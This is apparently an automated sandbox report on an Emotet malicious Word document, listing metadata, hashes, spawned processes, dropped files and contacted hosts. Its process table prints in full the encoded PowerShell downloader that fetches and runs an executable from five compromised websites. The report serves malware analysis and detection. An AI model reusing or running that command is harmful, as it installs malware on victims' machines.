File name: | 7cfb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc |
Full analysis: | https://app.any.run/tasks/c7bbc189-3ba8-4634-9b73-943283758c39 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 19:19:39 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: CSS, Subject: program, Author: Johnnie Mosciski, Keywords: Sleek Soft Soap, Comments: 24 hour, Template: Normal.dotm, Last Saved By: Wyman Swift, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 06:52:00 2019, Last Saved Time/Date: Mon Oct 14 06:52:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0 |
MD5: | B613A11097843DDBB5ABECF23E2808E5 |
SHA1: | A9F53D866F76C480230F462C3384434310D09FED |
SHA256: | 7CFB222A4E97E5EC87F4D2C6D0A8913ED3CCAE3A3861507C98E78269B724875C |
SSDEEP: | 6144:Tg39prLKUzSFnLx3/hvbrptZI141ekKGQ2:Tg39prGUGFt3l3TZ5ej |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | CSS |
---|---|
Subject: | program |
Author: | Johnnie Mosciski |
Keywords: | Sleek Soft Soap |
Comments: | 24 hour |
Template: | Normal.dotm |
LastModifiedBy: | Wyman Swift |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:14 05:52:00 |
ModifyDate: | 2019:10:14 05:52:00 |
Pages: | 1 |
Words: | 30 |
Characters: | 172 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Sipes, Schowalter and Koch |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 201 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Sporer |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2660 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\7cfb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1740 | powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABkAGUAMwA3ADkAOQA3AGUAMwBjADEAMAA1ADcAMQA9ACcAYQAwAHgAMwBmADgAYgBjADcAMAA3ADEAZAAwAGQAJwA7ACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACAAPQAgACcAOQA0ADkAJwA7ACQAYQAwAHgANgBmADYAMwBlADAAZAA4ADIAMAA3ADAAZAAyAD0AJwBhADAAeAA3ADYAZgBkADgANQA4ADYAMQA2ADIAZgA4AGIAJwA7ACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAYgA3ADUANABhADQAMAAxAGUANwBmADkAYgA0ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4ADAANABiADAAZgAzADMAZgBlAGEAZAA9ACcAYQAwAHgAYgA5AGUANwA1ADYAYQBlADYAZgAnADsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABhADAAeABiADAAZgAxADIAZQBmADgAZgBiADUAZgA9ACcAaAB0AHQAcAA6AC8ALwB0AGUAbgBkAGUAbgBjAGkAYQBzAHYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADEAZAA5ADcAMgBhAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AYwBvAHIAcgBlAGwAYQB0AGkAbwBuAC4AYwBhAC8AZgBvAG4AdABzAC8ARgBTAEsAcgBZAE8AYwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBuAGUAeQBoAGEAaQByAHAAYQByAHQAeQAuAGMAbwBtAC8AYwBsAGEAcwBzAC4AbABvAGMAYQBsAC8AcABhAHIAdABzAF8AcwBlAHIAdgBpAGMAZQAvAHMANAB5ADAALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBkAGkAdgBpAG4AZQBkAG8AbABsAHoAYwBvAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGcAcgBhAGQAZQAvAGsAYwBiAGcALwAqAGgAdAB0AHAAOgAvAC8AZABuAGMAdgBpAGUAdABuAGEAbQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANABiAHYANAB6ADcAdQAvACcALgAiAFMAYABwAEwAaQBUACIAKAAnACoAJwApADsAJABhADAAeAA3AGUAZABmADYAOQA3ADAAOQA3AGYAYwAzADIAMAA9ACcAYQAwAHgAOAAwADIANgBkADMAOAAzADUAYwAxAGEANABhADkAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADAAZAAyAGMAOABlADMAMQA0AGEAMAAgAGkAbgAgACQAYQAwAHgAYgAwAGYAMQAyAGUAZgA4AGYAYgA1AGYAKQB7AHQAcgB5AHsAJABhADAAeABjAGMANQBkADAANwAxADUAYQAxADIAZQA3AC4AIgBkAG8AYAB3AGAATgBgAGwATwBBAGQARgBpAEwARQAiACgAJABhADAAeAAwAGQAMgBjADgAZQAzADEANABhADAALAAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApADsAJABhADAAeABiADAAMABhADcAZQBjAGIAZgA3ADgAOAAzAD0AJwBhADAAeAA3ADEAOAA3AGQAYgBhAGEANQBjACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQAYQAwAHgAOAAyAGIAOABkAGMANABiADEANwAxAGMAMwApAC4AIgBsAEUAYABOAGcAdABoACIAIAAtAGcAZQAgADMANgA1ADkAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAFIAdAAiACgAJABhADAAeAA4ADIAYgA4AGQAYwA0AGIAMQA3ADEAYwAzACkAOwAkAGEAMAB4ADUAYwA1AGUAMQA3AGYAZAAzADEAPQAnAGEAMAB4AGEAZABjAGYAYgAyADUAMwAyADMAMgAxADEANgAxACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4AGUANgAxADcANQBhAGEAMgBhADEAZgBmAGEAZQA9ACcAYQAwAHgANwAwAGMAZAA1ADEAZQA3ADEAMwAyADkAMwAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABhADAAeAA1ADgAMgA0AGEAZgBlADUAMwAxAGQAMQAwADYANAA9ACcAYQAwAHgAYQBiADkANQA0ADkANgBkADcAYQA1ADEAOAAxACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7F2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1740 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V9FMY44ZJX6UGURFXBY7.temp | — | |
MD5:— | SHA256:— | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC985955.wmf | wmf | |
MD5:5F6A5230B31FE7E16E1BF428DA36186B | SHA256:C81180A9C124061F19A41ABBC1CDEC81B8182FCDB26240A222FB88684B01471F | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7A2E50F9.wmf | wmf | |
MD5:E9EA0224A0B59683F7F913B80FC4C68B | SHA256:96116C45AEAB440DC68095A682D4F2F7F81CD465B400FD6F847A03721BE80072 | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA798ED8.wmf | wmf | |
MD5:E68EE2852AA1830F259E98F70AB65B66 | SHA256:085A291D0FE90E2E97FC4E548916BE37288E17116EC8120E124A1FE73E70BECF | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\36C4D373.wmf | wmf | |
MD5:AC07EEC2DBF71D4064CA3F9F20D0A086 | SHA256:D0EE5067835E5A1292E2805A6FDE4F8652D5287890B2651D366DCCA67247C965 | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\633E566F.wmf | wmf | |
MD5:E6CC30CFFCBBFCDEAA6486310C5F1A23 | SHA256:4C501A29AF5C6ACD9C3C63874C011A712B24A0108D89E68735A2C1EE0B1F39C9 | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90EE52A6.wmf | wmf | |
MD5:7072FC3981FACAB89652F8EC8D085FB3 | SHA256:16C4AF060AF9BAC73DCF151B6C2013BE7198AAC0813A1125BA990B85564DA029 | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:D3EBFE577A9E5C0557E4EBD716FD1665 | SHA256:B524ABBCCF23E897595B6C25CA4F696628A119623F491796A89D77F311635EE0 | |||
2660 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$fb222a4e97e5ec87f4d2c6d0a8913ed3ccae3a3861507c98e78269b724875c.doc | pgc | |
MD5:7764119855872AE04C1213CED80CDE79 | SHA256:602DABD291E14E352CE988E37190BF163A0307B72131D1197C9B33932BBD5A65 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1740 | powershell.exe | GET | 404 | 192.155.90.244:80 | http://www.moneyhairparty.com/class.local/parts_service/s4y0/ | US | xml | 345 b | unknown |
1740 | powershell.exe | GET | 404 | 69.42.58.144:80 | http://www.correlation.ca/fonts/FSKrYOc/ | CA | xml | 345 b | suspicious |
1740 | powershell.exe | GET | 404 | 149.56.222.236:80 | http://tendenciasv.com/wp-admin/1d972a/ | CA | xml | 345 b | suspicious |
1740 | powershell.exe | GET | 404 | 45.56.101.4:80 | http://www.divinedollzco.com/wp-content/upgrade/kcbg/ | US | xml | 345 b | unknown |
1740 | powershell.exe | GET | 404 | 45.119.83.237:80 | http://dncvietnam.com/wp-includes/4bv4z7u/ | VN | xml | 345 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1740 | powershell.exe | 45.56.101.4:80 | www.divinedollzco.com | Linode, LLC | US | unknown |
1740 | powershell.exe | 69.42.58.144:80 | www.correlation.ca | Peer 1 Network (USA) Inc. | CA | suspicious |
1740 | powershell.exe | 149.56.222.236:80 | tendenciasv.com | OVH SAS | CA | suspicious |
1740 | powershell.exe | 192.155.90.244:80 | www.moneyhairparty.com | Linode, LLC | US | unknown |
1740 | powershell.exe | 45.119.83.237:80 | dncvietnam.com | Long Van System Solution JSC | VN | malicious |
Domain | IP | Reputation |
---|---|---|
tendenciasv.com |
| suspicious |
www.correlation.ca |
| suspicious |
www.moneyhairparty.com |
| unknown |
www.divinedollzco.com |
| unknown |
dncvietnam.com |
| malicious |